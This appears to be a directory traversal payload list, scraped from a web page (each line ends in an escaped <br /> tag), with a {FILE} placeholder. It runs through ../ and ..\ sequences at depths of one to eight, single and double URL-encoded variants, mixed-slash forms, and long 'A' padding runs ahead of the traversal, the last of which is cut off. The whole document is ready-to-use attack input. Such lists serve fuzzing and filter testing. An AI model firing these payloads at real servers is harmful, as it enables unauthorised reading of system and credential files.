%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
../{FILE}&lt;br /&gt;
../../{FILE}&lt;br /&gt;
../../../{FILE}&lt;br /&gt;
../../../../{FILE}&lt;br /&gt;
../../../../../{FILE}&lt;br /&gt;
../../../../../../{FILE}&lt;br /&gt;
../../../../../../../{FILE}&lt;br /&gt;
../../../../../../../../{FILE}&lt;br /&gt;
..%2f{FILE}&lt;br /&gt;
..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f{FILE}&lt;br /&gt;
%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/{FILE}&lt;br /&gt;
%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f{FILE}&lt;br /&gt;
..%252f{FILE}&lt;br /&gt;
..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
..%252f..%252f..%252f..%252f..%252f..%252f..%252f..%252f{FILE}&lt;br /&gt;
%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/%252e%252e/{FILE}&lt;br /&gt;
%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f%252e%252e%252f{FILE}&lt;br /&gt;
..\{FILE}&lt;br /&gt;
..\..\{FILE}&lt;br /&gt;
..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..\..\..\..\..\..\..\..\{FILE}&lt;br /&gt;
..%5c{FILE}&lt;br /&gt;
..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c{FILE}&lt;br /&gt;
%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\%2e%2e\{FILE}&lt;br /&gt;
%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c%2e%2e%5c{FILE}&lt;br /&gt;
..%255c{FILE}&lt;br /&gt;
..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
..%255c..%255c..%255c..%255c..%255c..%255c..%255c..%255c{FILE}&lt;br /&gt;
%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\%252e%252e\{FILE}&lt;br /&gt;
%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c{FILE}&lt;br /&gt;
\../{FILE}&lt;br /&gt;
\../\../{FILE}&lt;br /&gt;
\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
\../\../\../\../\../\../\../\../{FILE}&lt;br /&gt;
/..\{FILE}&lt;br /&gt;
/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
/..\/..\/..\/..\/..\/..\/..\/..\{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA/../../../../../../../../{FILE}&lt;br /&gt;
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA